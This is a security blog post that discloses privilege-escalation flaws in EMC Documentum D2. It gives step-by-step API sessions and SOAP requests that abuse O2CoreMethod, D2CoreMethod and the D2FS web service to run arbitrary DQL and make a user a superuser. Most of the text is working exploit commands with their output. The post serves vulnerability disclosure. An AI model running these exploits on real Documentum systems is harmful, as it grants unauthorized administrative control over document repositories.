documentum security vulnerabilities: more deep dive in D2

To be honest, it took some time to hack D2GetAdminTicketMethod in 4.2 release, but that time was not wasted at all – now I know that D2 is a pretty big security hole 🙂

O2CoreMethod

Allows to execute any dql statement with superuser privileges (actually the length of statement could not exceed 250 characteres):

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
0
API> create,c,dm_job
...
08002f0a80005dbc
API> append,c,l,method_arguments
SET> -dql update dm_user object set user_privileges=16 where user_name='hacker'
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='O2CoreMethod', 
    arguments='-docbase_name d242 -password "" -job_id 08002f0a80005dbc -transaction false'
...

[DM_API_E_BADATTRNAME]error:  "Bad attribute name 'r_object_id' for document/object."
(1 row affected)

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
16

D2FS WebService

I have no idea about whether D2 web-interface allows user to execute DQL statements or not (for example in latest webtop release EMC restricted access to DQL Editor component due to a lot of security issues described in this blog), but D2FS WebService does.

Unsuccessful attempt to create object through d2fs:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
           xmlns:con="http://www.emc.com/d2fs/services/content_service" 
           xmlns:com="http://www.emc.com/d2fs/models/common" 
           xmlns:con1="http://www.emc.com/d2fs/models/context">
    <soapenv:Header/>
    <soapenv:Body>
        <con:getDQLContentRequest com:id="2" 
                   dql="create dm_document object set object_name='test'">
            <con1:context uid="1" login="hacker" password="hacker">
                <con1:repository com:id="1" repositoryName="d242" serverVersion="7" 
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
        </con:getDQLContentRequest>
    </soapenv:Body>
</soapenv:Envelope>


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <soapenv:Fault>
            <faultcode>soapenv:Server</faultcode>
            <faultstring xml:lang="en">Exception Service</faultstring>
            <detail>
                <faultDocument target="IllegalStateException" 
                               reason="No match found" code="D2-SERVICE-ERR" 
                               xmlns="http://www.emc.com/d2fs/exceptions">
                    ......................................
                               </faultDocument>
            </detail>
        </soapenv:Fault>
    </soapenv:Body>
</soapenv:Envelope>

workaround (note “; union” at the end of query):

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
                  xmlns:con="http://www.emc.com/d2fs/services/content_service" 
                  xmlns:com="http://www.emc.com/d2fs/models/common" 
                  xmlns:con1="http://www.emc.com/d2fs/models/context">
    <soapenv:Header/>
    <soapenv:Body>
        <con:getDQLContentRequest com:id="2" 
                dql="create dm_document object set object_name='test'; union ">
            <con1:context uid="1" login="hacker" password="hacker">
                <con1:repository com:id="1" repositoryName="d242" serverVersion="7" 
                    repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
        </con:getDQLContentRequest>
    </soapenv:Body>
</soapenv:Envelope>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <ns17:getDQLContentResponse 
                     xmlns:ns17="http://www.emc.com/d2fs/services/content_service"
                     xmlns="http://www.emc.com/d2fs/exceptions"
                     xmlns:ns18="http://www.emc.com/d2fs/models/item"
                     xmlns:ns3="http://www.emc.com/d2fs/models/common">
            <ns18:docItems>
                <ns18:upperItem children="false" immutable="false" 
                         selected="false" type="DQL" ns3:id="2"/>
                <ns18:items children="false" immutable="false" 
                         selected="false" ns3:id="0000000000000000"/>
            </ns18:docItems>
        </ns17:getDQLContentResponse>
    </soapenv:Body>
</soapenv:Envelope>

D2CoreMethod

Has the same problem as O2CoreMethod but does not require to create dm_job object:

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
0
API> ?,c,execute do_method with method='D2CoreMethod', 
   arguments='-docbase_name d242 -password "" 
   -dql_filter "update dm_user object set user_privileges=16 where user_name=''hacker''"'
...

[DM_API_E_BADATTRNAME]error:  "Bad attribute name 'r_object_id' for document/object."
(1 row affected)

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
16

2 thoughts on “documentum security vulnerabilities: more deep dive in D2

  1. Pingback: Second dive into D2 security | Documentum in a (nuts)HELL
  2. Pingback: Is it possible to compromise Documentum by deleting object? Typical mistakes | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s